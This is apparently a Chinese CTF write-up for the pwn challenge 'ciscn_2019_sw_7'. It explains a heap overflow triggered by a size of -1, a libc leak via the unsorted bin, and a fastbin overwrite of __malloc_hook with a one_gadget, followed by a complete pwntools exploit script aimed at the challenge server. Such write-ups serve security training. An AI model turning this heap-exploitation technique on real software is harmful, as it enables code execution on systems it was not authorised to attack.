ciscn_2019_sw_7

🐛

new的时候如果size输个-1,分配一块大小为0x20的chunk0,同时可以输入0xffffffff个字符,产生了堆溢出。利用这一点修改chunk1的size为0x91,free掉,产生unsorted bin,之后切割unsorted bin,使得chunk2的fd为main_arena+88,使用show功能获取leak。

之后就是fastbin打malloc_hook放onegadget。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from pwn import *
from LibcSearcher import *
#sh=process("./ciscn_2019_sw_7.dms")
sh=remote("pwn.buuoj.cn",20134)
libc=ELF("x64_libc.so.6")
onegadget=[0x45216,0x4526a,0xf02a4,0xf1147]
def new(size,content):
sh.recvuntil("> ")
sh.sendline("1")
sh.recvuntil("note:")
sh.sendline(str(size))
sh.recvuntil("note:")
sh.sendline(content)
def show(idx):
sh.recvuntil("> ")
sh.sendline("2")
sh.recvuntil("Index:")
sh.sendline(str(idx))
def delete(idx):
sh.recvuntil("> ")
sh.sendline("4")
sh.recvuntil("Index:")
sh.sendline(str(idx))
new(0x10,'a')#0
new(0x10,'b')#1
new(0x60,'c')#2
new(0x60,'d')#3
new(0x60,'e')#4
delete(0)
new(-1,p64(0)*2+p64(0x91))#0
delete(1)
new(0x10,'a')#1
show(2)
sh.recvuntil("2 : ")
leak=u64(sh.recv(6)+'\x00\x00')
mallochook=leak-88-0x10
log.success("mallochook: "+hex(mallochook))
libcbase=leak-88-0x3C4B20
log.success("libcbase: "+hex(libcbase))
delete(3)
delete(0)
new(-1,p64(0)*2+p64(0x21)+p64(0)*3+p64(0x71)+p64(leak)*2+p64(0)*10+p64(0x70)*2+p64(mallochook-0x23))#0
new(0x60,'a')
new(0x60,'\x00'*11+p64(libcbase+onegadget[2]))
sh.recvuntil("> ")
sh.sendline("1")
sh.recvuntil("note:")
sh.sendline("4eriri")
#gdb.attach(sh)
sh.interactive()
文章目录
|